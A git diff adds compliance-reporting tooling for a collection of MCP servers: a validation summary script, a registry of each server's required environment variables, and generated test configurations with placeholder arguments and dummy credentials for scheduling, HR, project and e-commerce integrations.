+  } catch (err) {
+    // mcp-jest validate exits with code 1 for non-compliant, but still has output
+    const output = err.stdout?.toString() || err.stderr?.toString() || '';
+    result = { name, ...parseValidation(output, 0, 'ERROR') };
+    if (result.issues.length === 0) {
+      // Nothing parsable: keep the first output line, or the exec error itself
+      // (timeout, missing binary) so the report never records a blank issue.
+      result.issues = [firstLine(output) || firstLine(err.message) || 'Validation failed'];
+    }
+  }
+
+  totalScore += result.score || 0;
+  results.push(result);
+
+  const issueNote = result.issues.length > 0 ? '— ' + result.issues.length + ' issue(s)' : '';
+  console.log(` ${scoreEmoji(result.score)} ${name}: ${result.score ?? '-'}/100 (${result.level}) ${issueNote}`);
+}
+
+// Summary
+const validResults = results.filter(r => r.score !== null);
+const avgScore = validResults.length > 0 ? Math.round(totalScore / validResults.length) : 0;
+const perfect = validResults.filter(r => r.score >= 95).length;
+const good = validResults.filter(r => r.score >= 80 && r.score < 95).length;
+const needsWork = validResults.filter(r => r.score < 80).length;
+
+console.log('\n' + '═'.repeat(60));
+console.log(' MCP FACTORY — COMPLIANCE REPORT');
+console.log('═'.repeat(60));
+console.log(`\nServers validated: ${validResults.length}/${results.length}`);
+console.log(`Average score: ${avgScore}/100`);
+console.log(`🟢 Compliant (95+): ${perfect}`);
+console.log(`🟡 Near (80-94): ${good}`);
+console.log(`🔴 Needs work (<80): ${needsWork}`);
+
+// Common issues (Map, so issue text like "constructor" cannot hit Object.prototype)
+const issueFreq = new Map();
+for (const issue of results.flatMap(r => r.issues)) {
+  issueFreq.set(issue, (issueFreq.get(issue) || 0) + 1);
+}
+const sortedIssues = [...issueFreq.entries()].sort((a, b) => b[1] - a[1]);
+
+if (sortedIssues.length > 0) {
+  console.log('\nMost common issues:');
+  for (const [issue, count] of sortedIssues.slice(0, 5)) {
+    console.log(` ${count}x — ${issue}`);
+  }
+}
+
+// Write report (single timestamp so both file names and the embedded date agree)
+const now = new Date();
+const dateStamp = now.toISOString().split('T')[0];
+const report = {
+  date: now.toISOString(),
+  summary: { total: results.length, validated: validResults.length, avgScore, perfect, good, needsWork },
+  commonIssues: sortedIssues,
+  servers: results
+};
+
+const reportPath = resolve(REPORTS_DIR, `compliance-${dateStamp}.json`);
+writeFileSync(reportPath, JSON.stringify(report, null, 2));
+
+// Also write markdown
+let md = `# MCP Factory Compliance Report\n\n`;
+md += `**Date:** ${now.toLocaleDateString()}\n`;
+md += `**Average Score:** ${avgScore}/100\n\n`;
+md += `| Server | Score | Level | Issues |\n|--------|-------|-------|--------|\n`;
+for (const r of results) {
+  const issues = mdCell(r.issues.join('; ') || 'None');
+  md += `| ${scoreEmoji(r.score)} ${r.name} | ${r.score ?? '-'}/100 | ${r.level} | ${issues} |\n`;
+}
+
+const mdPath = resolve(REPORTS_DIR, `compliance-${dateStamp}.md`);
+writeFileSync(mdPath, md);
+console.log(`\nReports saved:\n ${reportPath}\n ${mdPath}`);
diff --git a/factory-tools/server-registry.json b/factory-tools/server-registry.json new file mode 100644 index 0000000..3c0c66e --- /dev/null +++ b/factory-tools/server-registry.json @@ -0,0 +1,35 @@ +{ + "servers_root": "../mcp-diagrams/mcp-servers", + "servers": { + "acuity-scheduling": { "env": ["ACUITY_API_KEY", "ACUITY_USER_ID"] }, + "bamboohr": { "env": ["BAMBOOHR_API_KEY", "BAMBOOHR_COMPANY_DOMAIN"] }, + "basecamp": { "env": ["BASECAMP_ACCESS_TOKEN", "BASECAMP_ACCOUNT_ID", "BASECAMP_APP_IDENTITY"] }, + "bigcommerce": { "env": ["BIGCOMMERCE_ACCESS_TOKEN", "BIGCOMMERCE_STORE_HASH"] }, + "brevo": { "env": ["BREVO_API_KEY"] }, + "calendly": { "env": ["CALENDLY_API_KEY"] }, + "clickup": { "env": ["CLICKUP_API_KEY"] }, + "close": { "env": ["CLOSE_API_KEY"] }, + "clover": { "env": ["CLOVER_API_KEY", "CLOVER_MERCHANT_ID", "CLOVER_REGION", "CLOVER_SANDBOX"] }, + "constant-contact": { "env": ["CONSTANT_CONTACT_ACCESS_TOKEN"] }, + "fieldedge": { "env": ["FIELDEDGE_API_KEY", "FIELDEDGE_SUBSCRIPTION_KEY"] }, + "freshbooks": { "env": ["FRESHBOOKS_ACCESS_TOKEN", "FRESHBOOKS_ACCOUNT_ID"] }, + "freshdesk": { "env": ["FRESHDESK_API_KEY", "FRESHDESK_DOMAIN"] }, + "gusto": { "env": ["GUSTO_ACCESS_TOKEN"] }, + "helpscout": { "env": ["HELPSCOUT_ACCESS_TOKEN"] }, + "housecall-pro": { "env": ["HOUSECALL_PRO_API_KEY"] }, + "jobber": { "env": ["JOBBER_ACCESS_TOKEN"] }, + "keap": { "env": ["KEAP_ACCESS_TOKEN"] }, + "lightspeed": { "env": ["LIGHTSPEED_ACCESS_TOKEN", "LIGHTSPEED_ACCOUNT_ID"] }, + "mailchimp": { "env": ["MAILCHIMP_API_KEY"] }, + "pipedrive": { "env": ["PIPEDRIVE_API_TOKEN"] }, + "rippling": { "env": ["RIPPLING_API_KEY"] }, + "servicetitan": { "env": ["SERVICETITAN_CLIENT_ID", "SERVICETITAN_CLIENT_SECRET",
"SERVICETITAN_TENANT_ID"] }, + "squarespace": { "env": ["SQUARESPACE_API_KEY"] }, + "toast": { "env": ["TOAST_CLIENT_ID", "TOAST_CLIENT_SECRET", "TOAST_RESTAURANT_GUID"] }, + "touchbistro": { "env": ["TOUCHBISTRO_API_KEY", "TOUCHBISTRO_VENUE_ID"] }, + "trello": { "env": ["TRELLO_API_KEY", "TRELLO_TOKEN"] }, + "wave": { "env": ["WAVE_API_TOKEN"] }, + "wrike": { "env": ["WRIKE_ACCESS_TOKEN"] }, + "zendesk": { "env": ["ZENDESK_API_TOKEN", "ZENDESK_EMAIL", "ZENDESK_SUBDOMAIN"] } + } +} diff --git a/factory-tools/test-configs/acuity-scheduling-tests.json b/factory-tools/test-configs/acuity-scheduling-tests.json new file mode 100644 index 0000000..b848bf9 --- /dev/null +++ b/factory-tools/test-configs/acuity-scheduling-tests.json @@ -0,0 +1,174 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/acuity-scheduling/dist/index.js" + ], + "env": { + "ACUITY_API_KEY": "factory_discovery_dummy", + "ACUITY_USER_ID": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_appointments": { + "args": { + "minDate": "test_value", + "maxDate": "test_value", + "calendarID": 50, + "appointmentTypeID": 50, + "canceled": true, + "max": 50 + }, + "expect": "content && content.length > 0" + }, + "list_appointments:empty-minDate": { + "args": { + "minDate": "", + "maxDate": "test_value", + "calendarID": 50, + "appointmentTypeID": 50, + "canceled": true, + "max": 50 + }, + "expect": "exists" + }, + "list_appointments:empty-maxDate": { + "args": { + "minDate": "test_value", + "maxDate": "", + "calendarID": 50, + "appointmentTypeID": 50, + "canceled": true, + "max": 50 + }, + "expect": "exists" + }, + "get_appointment": { + "args": { + "id": 50 + }, + "expect": "content && content.length > 0" + }, + "create_appointment": { + "args": { + "datetime": "test_value", + "appointmentTypeID": 50, + "calendarID": 50, + "firstName": "Test Name", + "lastName": "Test Name", + "email": "test@example.com", + "phone": 
"test_value", + "notes": "test_value", + "fields": [] + }, + "expect": "content && content.length > 0" + }, + "create_appointment:empty-phone": { + "args": { + "datetime": "test_value", + "appointmentTypeID": 50, + "calendarID": 50, + "firstName": "Test Name", + "lastName": "Test Name", + "email": "test@example.com", + "phone": "", + "notes": "test_value", + "fields": [] + }, + "expect": "exists" + }, + "create_appointment:empty-notes": { + "args": { + "datetime": "test_value", + "appointmentTypeID": 50, + "calendarID": 50, + "firstName": "Test Name", + "lastName": "Test Name", + "email": "test@example.com", + "phone": "test_value", + "notes": "", + "fields": [] + }, + "expect": "exists" + }, + "cancel_appointment": { + "args": { + "id": 50, + "cancelNote": "test_value", + "noShow": true + }, + "expect": "content && content.length > 0" + }, + "cancel_appointment:empty-cancelNote": { + "args": { + "id": 50, + "cancelNote": "", + "noShow": true + }, + "expect": "exists" + }, + "list_calendars": { + "args": {}, + "expect": "content && content.length > 0" + }, + "get_availability": { + "args": { + "appointmentTypeID": 50, + "calendarID": 50, + "date": "test_value", + "month": "test_value", + "timezone": "test_value" + }, + "expect": "content && content.length > 0" + }, + "get_availability:empty-date": { + "args": { + "appointmentTypeID": 50, + "calendarID": 50, + "date": "", + "month": "test_value", + "timezone": "test_value" + }, + "expect": "exists" + }, + "get_availability:empty-month": { + "args": { + "appointmentTypeID": 50, + "calendarID": 50, + "date": "test_value", + "month": "", + "timezone": "test_value" + }, + "expect": "exists" + }, + "get_availability:empty-timezone": { + "args": { + "appointmentTypeID": 50, + "calendarID": 50, + "date": "test_value", + "month": "test_value", + "timezone": "" + }, + "expect": "exists" + }, + "list_clients": { + "args": { + "search": "test query", + "max": 50 + }, + "expect": "content && content.length > 0" + }, + 
"list_clients:empty-search": { + "args": { + "search": "", + "max": 50 + }, + "expect": "exists" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/acuity-scheduling.json b/factory-tools/test-configs/acuity-scheduling.json new file mode 100644 index 0000000..9d4f6ec --- /dev/null +++ b/factory-tools/test-configs/acuity-scheduling.json @@ -0,0 +1,12 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/acuity-scheduling/dist/index.js" + ], + "env": { + "ACUITY_API_KEY": "factory_discovery_dummy", + "ACUITY_USER_ID": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/bamboohr-tests.json b/factory-tools/test-configs/bamboohr-tests.json new file mode 100644 index 0000000..79a4054 --- /dev/null +++ b/factory-tools/test-configs/bamboohr-tests.json @@ -0,0 +1,113 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/bamboohr/dist/index.js" + ], + "env": { + "BAMBOOHR_API_KEY": "factory_discovery_dummy", + "BAMBOOHR_COMPANY_DOMAIN": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_employees": { + "args": {}, + "expect": "content && content.length > 0" + }, + "get_employee": { + "args": { + "employee_id": "test-id-123", + "fields": [] + }, + "expect": "content && content.length > 0" + }, + "list_time_off_requests": { + "args": { + "start": "test_value", + "end": "test_value", + "status": "approved", + "employee_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "list_time_off_requests:empty-start": { + "args": { + "start": "", + "end": "test_value", + "status": "approved", + "employee_id": "test-id-123" + }, + "expect": "exists" + }, + "list_time_off_requests:empty-end": { + "args": { + "start": "test_value", + "end": "", + "status": "approved", + "employee_id": 
"test-id-123" + }, + "expect": "exists" + }, + "list_time_off_requests:empty-status": { + "args": { + "start": "test_value", + "end": "test_value", + "status": "", + "employee_id": "test-id-123" + }, + "expect": "exists" + }, + "list_time_off_requests:empty-employee_id": { + "args": { + "start": "test_value", + "end": "test_value", + "status": "approved", + "employee_id": "" + }, + "expect": "exists" + }, + "request_time_off": { + "args": { + "employee_id": "test-id-123", + "time_off_type_id": "test-id-123", + "start": "test_value", + "end": "test_value", + "amount": 50, + "notes": "test_value" + }, + "expect": "content && content.length > 0" + }, + "request_time_off:empty-notes": { + "args": { + "employee_id": "test-id-123", + "time_off_type_id": "test-id-123", + "start": "test_value", + "end": "test_value", + "amount": 50, + "notes": "" + }, + "expect": "exists" + }, + "list_goals": { + "args": { + "employee_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "get_directory": { + "args": {}, + "expect": "content && content.length > 0" + }, + "list_files": { + "args": { + "employee_id": "test-id-123" + }, + "expect": "content && content.length > 0" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/bamboohr.json b/factory-tools/test-configs/bamboohr.json new file mode 100644 index 0000000..fc52550 --- /dev/null +++ b/factory-tools/test-configs/bamboohr.json @@ -0,0 +1,12 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/bamboohr/dist/index.js" + ], + "env": { + "BAMBOOHR_API_KEY": "factory_discovery_dummy", + "BAMBOOHR_COMPANY_DOMAIN": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/basecamp-tests.json b/factory-tools/test-configs/basecamp-tests.json new file mode 100644 index 0000000..88fb5e9 --- /dev/null +++ 
b/factory-tools/test-configs/basecamp-tests.json @@ -0,0 +1,150 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/basecamp/dist/index.js" + ], + "env": { + "BASECAMP_ACCESS_TOKEN": "factory_discovery_dummy", + "BASECAMP_ACCOUNT_ID": "factory_discovery_dummy", + "BASECAMP_APP_IDENTITY": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_projects": { + "args": { + "status": "active" + }, + "expect": "content && content.length > 0" + }, + "list_projects:empty-status": { + "args": { + "status": "" + }, + "expect": "exists" + }, + "get_project": { + "args": { + "project_id": 50 + }, + "expect": "content && content.length > 0" + }, + "list_todos": { + "args": { + "project_id": 50, + "todolist_id": 50, + "status": "active", + "completed": true + }, + "expect": "content && content.length > 0" + }, + "list_todos:empty-status": { + "args": { + "project_id": 50, + "todolist_id": 50, + "status": "", + "completed": true + }, + "expect": "exists" + }, + "create_todo": { + "args": { + "project_id": 50, + "todolist_id": 50, + "content": "Sample content for testing", + "description": "test_value", + "assignee_ids": [], + "due_on": "test_value", + "starts_on": "test_value", + "notify": true + }, + "expect": "content && content.length > 0" + }, + "create_todo:empty-description": { + "args": { + "project_id": 50, + "todolist_id": 50, + "content": "Sample content for testing", + "description": "", + "assignee_ids": [], + "due_on": "test_value", + "starts_on": "test_value", + "notify": true + }, + "expect": "exists" + }, + "create_todo:empty-due_on": { + "args": { + "project_id": 50, + "todolist_id": 50, + "content": "Sample content for testing", + "description": "test_value", + "assignee_ids": [], + "due_on": "", + "starts_on": "test_value", + "notify": true + }, + "expect": "exists" + }, + "create_todo:empty-starts_on": { + "args": { + "project_id": 50, + "todolist_id": 50, + "content": "Sample 
content for testing", + "description": "test_value", + "assignee_ids": [], + "due_on": "test_value", + "starts_on": "", + "notify": true + }, + "expect": "exists" + }, + "complete_todo": { + "args": { + "project_id": 50, + "todo_id": 50 + }, + "expect": "content && content.length > 0" + }, + "list_messages": { + "args": { + "project_id": 50, + "message_board_id": 50 + }, + "expect": "content && content.length > 0" + }, + "create_message": { + "args": { + "project_id": 50, + "message_board_id": 50, + "subject": "test_value", + "content": "Sample content for testing", + "status": "active", + "category_id": 50 + }, + "expect": "content && content.length > 0" + }, + "create_message:empty-status": { + "args": { + "project_id": 50, + "message_board_id": 50, + "subject": "test_value", + "content": "Sample content for testing", + "status": "", + "category_id": 50 + }, + "expect": "exists" + }, + "list_people": { + "args": { + "project_id": 50 + }, + "expect": "content && content.length > 0" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/basecamp.json b/factory-tools/test-configs/basecamp.json new file mode 100644 index 0000000..65b41e3 --- /dev/null +++ b/factory-tools/test-configs/basecamp.json @@ -0,0 +1,13 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/basecamp/dist/index.js" + ], + "env": { + "BASECAMP_ACCESS_TOKEN": "factory_discovery_dummy", + "BASECAMP_ACCOUNT_ID": "factory_discovery_dummy", + "BASECAMP_APP_IDENTITY": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/bigcommerce-tests.json b/factory-tools/test-configs/bigcommerce-tests.json new file mode 100644 index 0000000..d2a69d9 --- /dev/null +++ b/factory-tools/test-configs/bigcommerce-tests.json @@ -0,0 +1,462 @@ +{ + "server": { + "command": "node", + "args": [ + 
"/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/bigcommerce/dist/index.js" + ], + "env": { + "BIGCOMMERCE_ACCESS_TOKEN": "factory_discovery_dummy", + "BIGCOMMERCE_STORE_HASH": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_products": { + "args": { + "limit": 50, + "page": 50, + "name": "Test Name", + "sku": "test_value", + "brand_id": 50, + "categories": "test_value", + "is_visible": true, + "availability": "test_value", + "include": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_products:empty-name": { + "args": { + "limit": 50, + "page": 50, + "name": "", + "sku": "test_value", + "brand_id": 50, + "categories": "test_value", + "is_visible": true, + "availability": "test_value", + "include": "test_value" + }, + "expect": "exists" + }, + "list_products:empty-sku": { + "args": { + "limit": 50, + "page": 50, + "name": "Test Name", + "sku": "", + "brand_id": 50, + "categories": "test_value", + "is_visible": true, + "availability": "test_value", + "include": "test_value" + }, + "expect": "exists" + }, + "list_products:empty-categories": { + "args": { + "limit": 50, + "page": 50, + "name": "Test Name", + "sku": "test_value", + "brand_id": 50, + "categories": "", + "is_visible": true, + "availability": "test_value", + "include": "test_value" + }, + "expect": "exists" + }, + "list_products:empty-availability": { + "args": { + "limit": 50, + "page": 50, + "name": "Test Name", + "sku": "test_value", + "brand_id": 50, + "categories": "test_value", + "is_visible": true, + "availability": "", + "include": "test_value" + }, + "expect": "exists" + }, + "list_products:empty-include": { + "args": { + "limit": 50, + "page": 50, + "name": "Test Name", + "sku": "test_value", + "brand_id": 50, + "categories": "test_value", + "is_visible": true, + "availability": "test_value", + "include": "" + }, + "expect": "exists" + }, + "get_product": { + "args": { + "product_id": 50, + "include": "test_value" + }, + "expect": 
"content && content.length > 0" + }, + "get_product:empty-include": { + "args": { + "product_id": 50, + "include": "" + }, + "expect": "exists" + }, + "create_product": { + "args": { + "name": "Test Name", + "type": "test_value", + "weight": 50, + "price": 50, + "sku": "test_value", + "description": "test_value", + "categories": [], + "brand_id": 50, + "inventory_level": 50, + "inventory_tracking": "test_value", + "is_visible": true, + "availability": "test_value", + "cost_price": 50, + "sale_price": 50 + }, + "expect": "content && content.length > 0" + }, + "create_product:empty-sku": { + "args": { + "name": "Test Name", + "type": "test_value", + "weight": 50, + "price": 50, + "sku": "", + "description": "test_value", + "categories": [], + "brand_id": 50, + "inventory_level": 50, + "inventory_tracking": "test_value", + "is_visible": true, + "availability": "test_value", + "cost_price": 50, + "sale_price": 50 + }, + "expect": "exists" + }, + "create_product:empty-description": { + "args": { + "name": "Test Name", + "type": "test_value", + "weight": 50, + "price": 50, + "sku": "test_value", + "description": "", + "categories": [], + "brand_id": 50, + "inventory_level": 50, + "inventory_tracking": "test_value", + "is_visible": true, + "availability": "test_value", + "cost_price": 50, + "sale_price": 50 + }, + "expect": "exists" + }, + "create_product:empty-inventory_tracking": { + "args": { + "name": "Test Name", + "type": "test_value", + "weight": 50, + "price": 50, + "sku": "test_value", + "description": "test_value", + "categories": [], + "brand_id": 50, + "inventory_level": 50, + "inventory_tracking": "", + "is_visible": true, + "availability": "test_value", + "cost_price": 50, + "sale_price": 50 + }, + "expect": "exists" + }, + "create_product:empty-availability": { + "args": { + "name": "Test Name", + "type": "test_value", + "weight": 50, + "price": 50, + "sku": "test_value", + "description": "test_value", + "categories": [], + "brand_id": 50, + 
"inventory_level": 50, + "inventory_tracking": "test_value", + "is_visible": true, + "availability": "", + "cost_price": 50, + "sale_price": 50 + }, + "expect": "exists" + }, + "update_product": { + "args": { + "product_id": 50, + "name": "Test Name", + "price": 50, + "sku": "test_value", + "description": "test_value", + "categories": [], + "inventory_level": 50, + "is_visible": true, + "availability": "test_value", + "sale_price": 50 + }, + "expect": "content && content.length > 0" + }, + "update_product:empty-name": { + "args": { + "product_id": 50, + "name": "", + "price": 50, + "sku": "test_value", + "description": "test_value", + "categories": [], + "inventory_level": 50, + "is_visible": true, + "availability": "test_value", + "sale_price": 50 + }, + "expect": "exists" + }, + "update_product:empty-sku": { + "args": { + "product_id": 50, + "name": "Test Name", + "price": 50, + "sku": "", + "description": "test_value", + "categories": [], + "inventory_level": 50, + "is_visible": true, + "availability": "test_value", + "sale_price": 50 + }, + "expect": "exists" + }, + "update_product:empty-description": { + "args": { + "product_id": 50, + "name": "Test Name", + "price": 50, + "sku": "test_value", + "description": "", + "categories": [], + "inventory_level": 50, + "is_visible": true, + "availability": "test_value", + "sale_price": 50 + }, + "expect": "exists" + }, + "update_product:empty-availability": { + "args": { + "product_id": 50, + "name": "Test Name", + "price": 50, + "sku": "test_value", + "description": "test_value", + "categories": [], + "inventory_level": 50, + "is_visible": true, + "availability": "", + "sale_price": 50 + }, + "expect": "exists" + }, + "list_orders": { + "args": { + "limit": 50, + "page": 50, + "min_date_created": "test_value", + "max_date_created": "test_value", + "status_id": 50, + "customer_id": 50, + "min_total": 50, + "max_total": 50, + "is_deleted": true, + "sort": "test_value" + }, + "expect": "content && content.length > 0" + 
}, + "list_orders:empty-min_date_created": { + "args": { + "limit": 50, + "page": 50, + "min_date_created": "", + "max_date_created": "test_value", + "status_id": 50, + "customer_id": 50, + "min_total": 50, + "max_total": 50, + "is_deleted": true, + "sort": "test_value" + }, + "expect": "exists" + }, + "list_orders:empty-max_date_created": { + "args": { + "limit": 50, + "page": 50, + "min_date_created": "test_value", + "max_date_created": "", + "status_id": 50, + "customer_id": 50, + "min_total": 50, + "max_total": 50, + "is_deleted": true, + "sort": "test_value" + }, + "expect": "exists" + }, + "list_orders:empty-sort": { + "args": { + "limit": 50, + "page": 50, + "min_date_created": "test_value", + "max_date_created": "test_value", + "status_id": 50, + "customer_id": 50, + "min_total": 50, + "max_total": 50, + "is_deleted": true, + "sort": "" + }, + "expect": "exists" + }, + "get_order": { + "args": { + "order_id": 50, + "include_products": true, + "include_shipping": true + }, + "expect": "content && content.length > 0" + }, + "list_customers": { + "args": { + "limit": 50, + "page": 50, + "email": "test@example.com", + "name": "Test Name", + "company": "test_value", + "customer_group_id": 50, + "date_created_min": "test_value", + "date_created_max": "test_value", + "include": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_customers:empty-email": { + "args": { + "limit": 50, + "page": 50, + "email": "", + "name": "Test Name", + "company": "test_value", + "customer_group_id": 50, + "date_created_min": "test_value", + "date_created_max": "test_value", + "include": "test_value" + }, + "expect": "exists" + }, + "list_customers:empty-name": { + "args": { + "limit": 50, + "page": 50, + "email": "test@example.com", + "name": "", + "company": "test_value", + "customer_group_id": 50, + "date_created_min": "test_value", + "date_created_max": "test_value", + "include": "test_value" + }, + "expect": "exists" + }, + "list_customers:empty-company": 
{ + "args": { + "limit": 50, + "page": 50, + "email": "test@example.com", + "name": "Test Name", + "company": "", + "customer_group_id": 50, + "date_created_min": "test_value", + "date_created_max": "test_value", + "include": "test_value" + }, + "expect": "exists" + }, + "list_customers:empty-date_created_min": { + "args": { + "limit": 50, + "page": 50, + "email": "test@example.com", + "name": "Test Name", + "company": "test_value", + "customer_group_id": 50, + "date_created_min": "", + "date_created_max": "test_value", + "include": "test_value" + }, + "expect": "exists" + }, + "list_customers:empty-date_created_max": { + "args": { + "limit": 50, + "page": 50, + "email": "test@example.com", + "name": "Test Name", + "company": "test_value", + "customer_group_id": 50, + "date_created_min": "test_value", + "date_created_max": "", + "include": "test_value" + }, + "expect": "exists" + }, + "list_customers:empty-include": { + "args": { + "limit": 50, + "page": 50, + "email": "test@example.com", + "name": "Test Name", + "company": "test_value", + "customer_group_id": 50, + "date_created_min": "test_value", + "date_created_max": "test_value", + "include": "" + }, + "expect": "exists" + }, + "update_inventory": { + "args": { + "product_id": 50, + "variant_id": 50, + "inventory_level": 50, + "inventory_warning_level": 50 + }, + "expect": "content && content.length > 0" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/bigcommerce.json b/factory-tools/test-configs/bigcommerce.json new file mode 100644 index 0000000..85a6b8a --- /dev/null +++ b/factory-tools/test-configs/bigcommerce.json @@ -0,0 +1,12 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/bigcommerce/dist/index.js" + ], + "env": { + "BIGCOMMERCE_ACCESS_TOKEN": "factory_discovery_dummy", + "BIGCOMMERCE_STORE_HASH": "factory_discovery_dummy" + } + } +} \ No 
newline at end of file diff --git a/factory-tools/test-configs/brevo-tests.json b/factory-tools/test-configs/brevo-tests.json new file mode 100644 index 0000000..91c5b86 --- /dev/null +++ b/factory-tools/test-configs/brevo-tests.json @@ -0,0 +1,318 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/brevo/dist/index.js" + ], + "env": { + "BREVO_API_KEY": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "send_email": { + "args": { + "to": [], + "sender": {}, + "subject": "test_value", + "htmlContent": "Sample content for testing", + "textContent": "Sample content for testing", + "templateId": 50, + "params": {}, + "replyTo": {}, + "attachment": [], + "tags": [] + }, + "expect": "content && content.length > 0" + }, + "send_email:empty-subject": { + "args": { + "to": [], + "sender": {}, + "subject": "", + "htmlContent": "Sample content for testing", + "textContent": "Sample content for testing", + "templateId": 50, + "params": {}, + "replyTo": {}, + "attachment": [], + "tags": [] + }, + "expect": "exists" + }, + "send_email:empty-htmlContent": { + "args": { + "to": [], + "sender": {}, + "subject": "test_value", + "htmlContent": "", + "textContent": "Sample content for testing", + "templateId": 50, + "params": {}, + "replyTo": {}, + "attachment": [], + "tags": [] + }, + "expect": "exists" + }, + "send_email:empty-textContent": { + "args": { + "to": [], + "sender": {}, + "subject": "test_value", + "htmlContent": "Sample content for testing", + "textContent": "", + "templateId": 50, + "params": {}, + "replyTo": {}, + "attachment": [], + "tags": [] + }, + "expect": "exists" + }, + "list_contacts": { + "args": { + "limit": 50, + "offset": 50, + "modifiedSince": "test_value", + "sort": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_contacts:empty-modifiedSince": { + "args": { + "limit": 50, + "offset": 50, + "modifiedSince": "", + "sort": "test_value" + }, + "expect": 
"exists" + }, + "list_contacts:empty-sort": { + "args": { + "limit": 50, + "offset": 50, + "modifiedSince": "test_value", + "sort": "" + }, + "expect": "exists" + }, + "add_contact": { + "args": { + "email": "test@example.com", + "attributes": {}, + "listIds": [], + "updateEnabled": true, + "smtpBlacklistSender": [] + }, + "expect": "content && content.length > 0" + }, + "update_contact": { + "args": { + "identifier": "test-id-123", + "attributes": {}, + "listIds": [], + "unlinkListIds": [], + "emailBlacklisted": true, + "smsBlacklisted": true + }, + "expect": "content && content.length > 0" + }, + "list_campaigns": { + "args": { + "type": "test_value", + "status": "test_value", + "limit": 50, + "offset": 50, + "sort": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_campaigns:empty-type": { + "args": { + "type": "", + "status": "test_value", + "limit": 50, + "offset": 50, + "sort": "test_value" + }, + "expect": "exists" + }, + "list_campaigns:empty-status": { + "args": { + "type": "test_value", + "status": "", + "limit": 50, + "offset": 50, + "sort": "test_value" + }, + "expect": "exists" + }, + "list_campaigns:empty-sort": { + "args": { + "type": "test_value", + "status": "test_value", + "limit": 50, + "offset": 50, + "sort": "" + }, + "expect": "exists" + }, + "create_campaign": { + "args": { + "name": "Test Name", + "subject": "test_value", + "sender": {}, + "htmlContent": "Sample content for testing", + "templateId": 50, + "recipients": {}, + "scheduledAt": "test_value", + "replyTo": "test_value", + "toField": "test_value", + "tag": "test_value" + }, + "expect": "content && content.length > 0" + }, + "create_campaign:empty-htmlContent": { + "args": { + "name": "Test Name", + "subject": "test_value", + "sender": {}, + "htmlContent": "", + "templateId": 50, + "recipients": {}, + "scheduledAt": "test_value", + "replyTo": "test_value", + "toField": "test_value", + "tag": "test_value" + }, + "expect": "exists" + }, + 
"create_campaign:empty-scheduledAt": { + "args": { + "name": "Test Name", + "subject": "test_value", + "sender": {}, + "htmlContent": "Sample content for testing", + "templateId": 50, + "recipients": {}, + "scheduledAt": "", + "replyTo": "test_value", + "toField": "test_value", + "tag": "test_value" + }, + "expect": "exists" + }, + "create_campaign:empty-replyTo": { + "args": { + "name": "Test Name", + "subject": "test_value", + "sender": {}, + "htmlContent": "Sample content for testing", + "templateId": 50, + "recipients": {}, + "scheduledAt": "test_value", + "replyTo": "", + "toField": "test_value", + "tag": "test_value" + }, + "expect": "exists" + }, + "create_campaign:empty-toField": { + "args": { + "name": "Test Name", + "subject": "test_value", + "sender": {}, + "htmlContent": "Sample content for testing", + "templateId": 50, + "recipients": {}, + "scheduledAt": "test_value", + "replyTo": "test_value", + "toField": "", + "tag": "test_value" + }, + "expect": "exists" + }, + "create_campaign:empty-tag": { + "args": { + "name": "Test Name", + "subject": "test_value", + "sender": {}, + "htmlContent": "Sample content for testing", + "templateId": 50, + "recipients": {}, + "scheduledAt": "test_value", + "replyTo": "test_value", + "toField": "test_value", + "tag": "" + }, + "expect": "exists" + }, + "send_sms": { + "args": { + "sender": "test_value", + "recipient": "test_value", + "content": "Sample content for testing", + "type": "test_value", + "tag": "test_value", + "webUrl": "https://example.com" + }, + "expect": "content && content.length > 0" + }, + "send_sms:empty-type": { + "args": { + "sender": "test_value", + "recipient": "test_value", + "content": "Sample content for testing", + "type": "", + "tag": "test_value", + "webUrl": "https://example.com" + }, + "expect": "exists" + }, + "send_sms:empty-tag": { + "args": { + "sender": "test_value", + "recipient": "test_value", + "content": "Sample content for testing", + "type": "test_value", + "tag": "", + 
